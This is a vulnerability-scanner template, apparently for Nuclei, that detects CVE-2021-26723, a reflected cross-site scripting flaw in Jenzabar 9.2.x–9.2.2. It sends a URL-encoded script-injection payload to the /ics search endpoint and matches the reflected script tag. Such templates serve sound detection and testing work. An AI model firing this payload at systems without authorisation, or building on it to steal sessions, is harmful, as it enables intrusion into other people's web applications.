43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: CVE-2021-26723
|
|
|
|
info:
|
|
name: Jenzabar 9.2x-9.2.2 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html
|
|
- https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205
|
|
- https://jenzabar.com/blog
|
|
- https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26723
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-26723
|
|
cwe-id: CWE-79
|
|
tags: packetstorm,cve,cve2021,jenzabar,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "><script>alert(document.domain)</script>"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/08/28
|